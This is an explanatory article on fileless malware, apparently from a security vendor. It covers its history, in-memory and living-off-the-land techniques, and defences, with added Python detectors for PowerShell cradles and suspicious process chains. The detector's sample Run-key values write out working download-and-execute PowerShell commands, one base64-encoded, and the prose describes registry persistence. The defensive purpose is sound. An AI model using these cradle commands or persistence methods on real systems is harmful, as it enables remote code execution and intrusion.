The first appearance of a fileless malware attack is said to date back to 2001. And despite peaks in activity in 2017, 2019 and 2021, these fileless attacks are still largely misunderstood, and raise questions about how they work. But what are the technical characteristics of these attacks? And are cybersecurity tools actually able to detect them?
In April 2020, ENISA published a report explaining that fileless malware attacks are 10 times more likely to succeed than a conventional attack. We take a closer look at fileless virus attacks.
The first appearances of fileless malware
The term made its first appearance in 2001 with the Code Red worm. This worm exploited a buffer overrun vulnerability in Microsoft IIS web servers, and was the first code to be categorised as “fileless malware”. The term “fileless virus” is also used. No fewer than 359,000 servers were affected: their home page crashed and displayed a “Welcome to http://www.worm.com! Hacked by Chinese!” message from a mysterious virus that left no files and no permanent traces on the hard drive. And for good reason: after investigation, the worm was found to have run only in the memory of the infected machine, a first.
For the next two decades, this mechanism was widely used in Microsoft environments. As early as 2003, the SQL Slammer worm used the same modus operandi to compromise Microsoft SQL Server instances, with the aim of launching a denial-of-service attack. In 2013, the Lurk banking trojan exploited a vulnerability in Java and downloaded a malicious DLL into memory. In 2014, the modus operandi of the fileless malware attack evolved with the appearance of the Poweliks trojan, which installed itself in a Windows registry key whose value contained the malicious script. The malware then obtained persistence through a legitimate program used by the Windows operating system. In 2015, the Duqu 2.0 worm was used as a toolbox for cyber-espionage, with features such as lateral movement, data exfiltration and reconnaissance of the host and its immediate environment. In 2016, with the PowerSniff malware, the modus operandi evolved further, incorporating the fileless approach into only part of the attack. Initial access here is via a classic dropper, a Word file, which does not match the profile of a fileless attack at all. But this dropper contains a macro that runs PowerShell in the background to download a remote file and then run it directly in PowerShell memory. It is therefore this second part of the attack, in the form of a script and shellcode, that is considered fileless. But it was mainly in 2017 that fileless malware gained wider recognition, with the exfiltration of data on 150 million Equifax customers through a vulnerability in the Apache Struts web application framework.
For Sébastien Viou, Director of Product Cybersecurity and Cyber-Evangelist at Stormshield, these innovations are a demonstration of the technological lead that cyber-criminals held over the anti-virus vendors of the time: “Since it does not use a file that is written to the hard disk, a fileless malware cannot be detected by antivirus software that offers protection based on file fingerprinting mechanisms. The strength of this attack lies in the fact that it targets elements that are not covered by antivirus software. The cybercriminals were operating in a space in which the antivirus was simply not looking, leaving a door open on the victims’ machines.”
Fileless malware: shifting definitions and techniques
Memory-only malware, non-malware attack, zero-footprint attack... it goes under many different names, but what exactly is a fileless malware attack? It is a mechanism whose defining characteristic is running malware without leaving any trace on the disk, as Cyril Cléaud, a malware analyst at Stormshield, explains: “A fileless malware attack is a malicious attack in which remote code is retrieved and executed without using the intermediary of a local file. This may, for example, take the form of text strings retrieved from a web server and then passed as parameters to a script interpreter such as PowerShell. The code will then be executed directly in PowerShell memory. This is an attack that leaves no trace on the disk.” The techniques used by a fileless virus to execute malicious code in memory are diverse: hijacking native programs required for the proper functioning of the operating system, injecting malicious code into existing processes, storing malware in Windows registry keys, etc. There are even ready-to-use exploit kits, such as the PowerShell Empire, PowerSploit and Cobalt Strike tools. Using these tools, attackers can take remote control of the victim machine and subsequently attempt to obtain persistence on the machine across reboots. But more often than not, such fileless malware is based on a known vulnerability, with the aim of gaining privileged access to the operating system. And once there, the technical implementation is relatively simple, as Cyril Cléaud points out: “Information on this type of attack is readily available on the Internet. And in most cases, the command lines are very short. For an attacker who knows how to exploit the vulnerability, the first (preparatory) step would be to expose a malicious payload on a web server that they control and that is accessible via a URL of their choice. The second step will follow when the vulnerability is exploited, which is simply a question of requesting a script interpreter to download this payload and then execute it.”
How does fileless malware work? A typical scenario consists of three stages. In the first instance, cybercriminals need to gain initial access, usually through phishing and spear phishing campaigns. Although this initial phase of the attack is executed in memory only, the second step consists of making the access persistent even in the event of a reboot. At this stage, registry keys represent an asset for cybercriminals. Cyril Cléaud points out: “Some registry keys are read in order to run programs when the session is opened. By writing payload download and execution code into these keys as a PowerShell parameter, the cybercriminal has a persistent means of entry to download another viral payload onto the machine. The most convenient aspect for the attacker is that the malware is not stored on the victim’s machine: this means that firstly, there is no file and, secondly, attackers can update their malware in real time. However, even without a file, it leaves a trace: the URL for the payload. The trick is therefore to scramble this URL to prevent it from being detected as an indicator of compromise.” The third and final step depends on the initial aims of the attack: credential theft, data exfiltration or creation of a backdoor.
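As an added example (not from the article or from Stormshield), the following Python checker illustrates the defender's side of the scenario above: it scans autorun (Run-key style) values for the PowerShell download-and-execute pattern, decodes any -EncodedCommand blob, and pulls out the payload URL that, as Cyril Cléaud notes, remains the indicator of compromise. The Run-key values and the indicator list are constructed for the example.

```python
import base64
import re

# Illustrative indicator-of-attack patterns for PowerShell download-and-execute cradles
# (constructed for this example, not an exhaustive feed).
IOA_PATTERNS = [
    (r"(?i)-enc(?:odedcommand)?\s", "encoded command"),
    (r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b", "download cradle"),
    (r"(?i)\biex\b|invoke-expression", "in-memory execution"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-e(?:xecutionpolicy|p)\s+bypass", "execution policy bypass"),
]
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
ENC_RE = re.compile(r"(?i)-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)")

def encode_ps(command: str) -> str:
    """Encode a command the way -EncodedCommand expects it: base64 of UTF-16LE."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")

def decode_encoded_command(cmdline: str):
    """Return the plaintext hidden behind -EncodedCommand, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed or truncated blob: leave it to manual triage

def analyze_autoruns(values: dict) -> dict:
    """Flag autorun values that look like PowerShell cradles; report any payload URL (the IoC)."""
    findings = {}
    for name, cmdline in values.items():
        text = cmdline
        decoded = decode_encoded_command(cmdline)
        if decoded:
            text += "\n" + decoded  # inspect the de-obfuscated command as well
        indicators = [label for pat, label in IOA_PATTERNS if re.search(pat, text)]
        if indicators:
            findings[name] = {"indicators": indicators, "urls": URL_RE.findall(text)}
    return findings

# Constructed sample Run-key values (hypothetical); 203.0.113.0/24 is a documentation range.
SAMPLE_RUN_VALUES = {
    "OneDriveUpdate": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
    "Updater": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
               ".DownloadString('http://203.0.113.10/p.txt')\"",
    "Sync": "powershell.exe -w hidden -enc "
            + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.20/s.ps1')"),
}
```

Running analyze_autoruns(SAMPLE_RUN_VALUES) leaves the OneDrive entry alone and flags the other two, recovering the URL from the encoded entry as well.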
Another strong trend being observed is the hijacking or replacement of a legitimate program. A term that emerged at the DerbyCon 3 conference in 2013, Living Off the Land (LotL, or LOLBins, for “Living Off The Land Binaries”) is a practice that involves spoofing a utility program that is used by the operating system and is therefore recognised by it as legitimate. LOLBins frequently found on Windows include the utilities certutil.exe, mavinject.exe, cmdl.exe, msiexec and WMI (Windows Management Instrumentation), as well as the PowerShell and bash interpreters. These legitimate programs increase the efficiency of the attack tenfold, as some of them include native functions such as downloading files or connecting to a remote machine. The use of LOLBins in a cyber attack is therefore problematic, as it is very difficult to tell whether they are being used legitimately or maliciously. In some cases, these utilities are even found on security solution whitelists... It is therefore common to see the use of LOLBAS (LOL Binaries And Scripts), third-party scripts executed with the help of LOLBins, and LOLLibs, custom-developed libraries that provide additional functionality for the hijacked executable.
In 2018, the GandCrab ransomware-as-a-service platform incorporated fileless malware into its modus operandi; as a result, over 50,000 machines worldwide were infected. Given such innovative approaches, what can you do to detect an undetectable threat?
Fileless malware: how do you protect yourself against undetectable malware?
When faced with fileless malware, innovative protection techniques are required to complement traditional detection tools. To remedy this situation, new methods of detecting attacks have been developed. The most common one is based on the signature mechanism of Windows executables, as summarised by Sébastien Viou: “By default, Windows signs its executables. This complicates the task of the attacker, who must either replace the file in memory after the signature has been verified; or spoof the file’s destination by making the operating system believe that the file that has been replaced is the original file; or modify the application at its source. This strategy is a fairly simple way to protect against less advanced attacks.”
A second strategy is to improve the use of blacklists. Such blacklists need to go into more detail about what they block, and now contain patterns that have been used, such as strings or commands that have been detected as part of a malicious process. These are called Indicators of Attack (IOAs). In addition, an open-source project called LOLBAS (Living Off The Land Binaries and Scripts) was created in 2018 on the GitHub platform, and now includes more than 4,500 hijacked LOLBins. Aimed at the purple and blue teams of cybersecurity services companies, this project is currently maintained by more than 60 volunteer engineers, and categorises more than 150 binaries that are potentially subject to hijacking. For each utility, indicators are provided.
A third strategy is behavioural surveillance. Used by endpoint protection solutions, it makes it possible to monitor possible actions such as connecting to a command and control server, connecting to an IP with a bad reputation or correlating a sequence of actions, such as using a scripting engine from an untrustworthy command line and then reading and executing files. The detection of inconsistencies in the use of system utilities is also a strong signal, as identified by Cyril Cléaud: “In addition to the signature of the executable, there are behavioural monitoring mechanisms. It is possible to detect if a program is experiencing buffer overrun or code injection, or simply if an administration utility is being used by a user account that does not have the appropriate rights.”
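The sequence correlation described above (a scripting engine launched from an untrustworthy parent, which then connects out or executes files), as an added Python example that is not part of the article or of any Stormshield product. The endpoint telemetry, process names and addresses are constructed for the example; a real EDR would feed the same logic from its own event stream.

```python
SCRIPT_ENGINES = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Document and mail handlers that have no business launching a script interpreter.
UNTRUSTED_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
FOLLOW_ON = {"network", "file_exec"}  # actions that turn a suspicious launch into an alert

# Constructed endpoint telemetry (hypothetical): (ts, kind, pid, ppid, image, detail)
SAMPLE_EVENTS = [
    (1, "process", 100, 1, "explorer.exe", ""),
    (2, "process", 200, 100, "winword.exe", "invoice.docm"),
    (3, "process", 300, 200, "powershell.exe", "-w hidden -nop -c ..."),
    (4, "network", 300, 200, "powershell.exe", "203.0.113.10:443"),
    (5, "process", 310, 300, "rundll32.exe", "C:\\Users\\Public\\stage2.dll,Start"),
    (6, "file_exec", 310, 300, "rundll32.exe", "C:\\Users\\Public\\stage2.dll"),
    (7, "process", 400, 100, "powershell.exe", "Get-Process"),  # admin's interactive shell
    (8, "network", 400, 100, "powershell.exe", "10.0.0.5:5985"),
]

def suspicious_chain(procs: dict, pid, max_depth: int = 8):
    """Walk up the parent chain; return the image chain if an untrusted app spawned a script engine."""
    chain, engine_seen = [], False
    for _ in range(max_depth):
        entry = procs.get(pid)
        if entry is None:
            return None  # parent unknown (pre-dates telemetry): nothing to correlate
        image, pid = entry
        chain.append(image)
        if image in SCRIPT_ENGINES:
            engine_seen = True
        elif image in UNTRUSTED_PARENTS and engine_seen:
            return " -> ".join(reversed(chain))
    return None

def correlate(events):
    """Alert on a script engine launched from an untrusted parent that then goes on to act."""
    procs, alerts = {}, []
    for ts, kind, pid, ppid, image, detail in events:
        image = image.lower()
        if kind == "process":
            procs[pid] = (image, ppid)  # build the process tree as launches are seen
            continue
        if kind not in FOLLOW_ON:
            continue
        chain = suspicious_chain(procs, pid)
        if chain:
            alerts.append({"ts": ts, "pid": pid, "chain": chain,
                           "action": kind, "detail": detail})
    return alerts

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The administrator's interactive PowerShell session (pid 400) produces no alert because its parent is explorer.exe, whereas the same interpreter under winword.exe is flagged as soon as it connects out, and its rundll32.exe child is flagged through the full chain.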
Year after year, cybercriminals demonstrate their ability to implement obfuscation strategies that allow them to fly under the radar of security tools. And the emergence of players specialising in creating initial access, such as initial access brokers, unfortunately suggests that fileless malware attacks will continue to spread in the future. More than ever, companies must adopt methods for detecting indicators of attack, while striving to raise awareness of digital hygiene among all employees.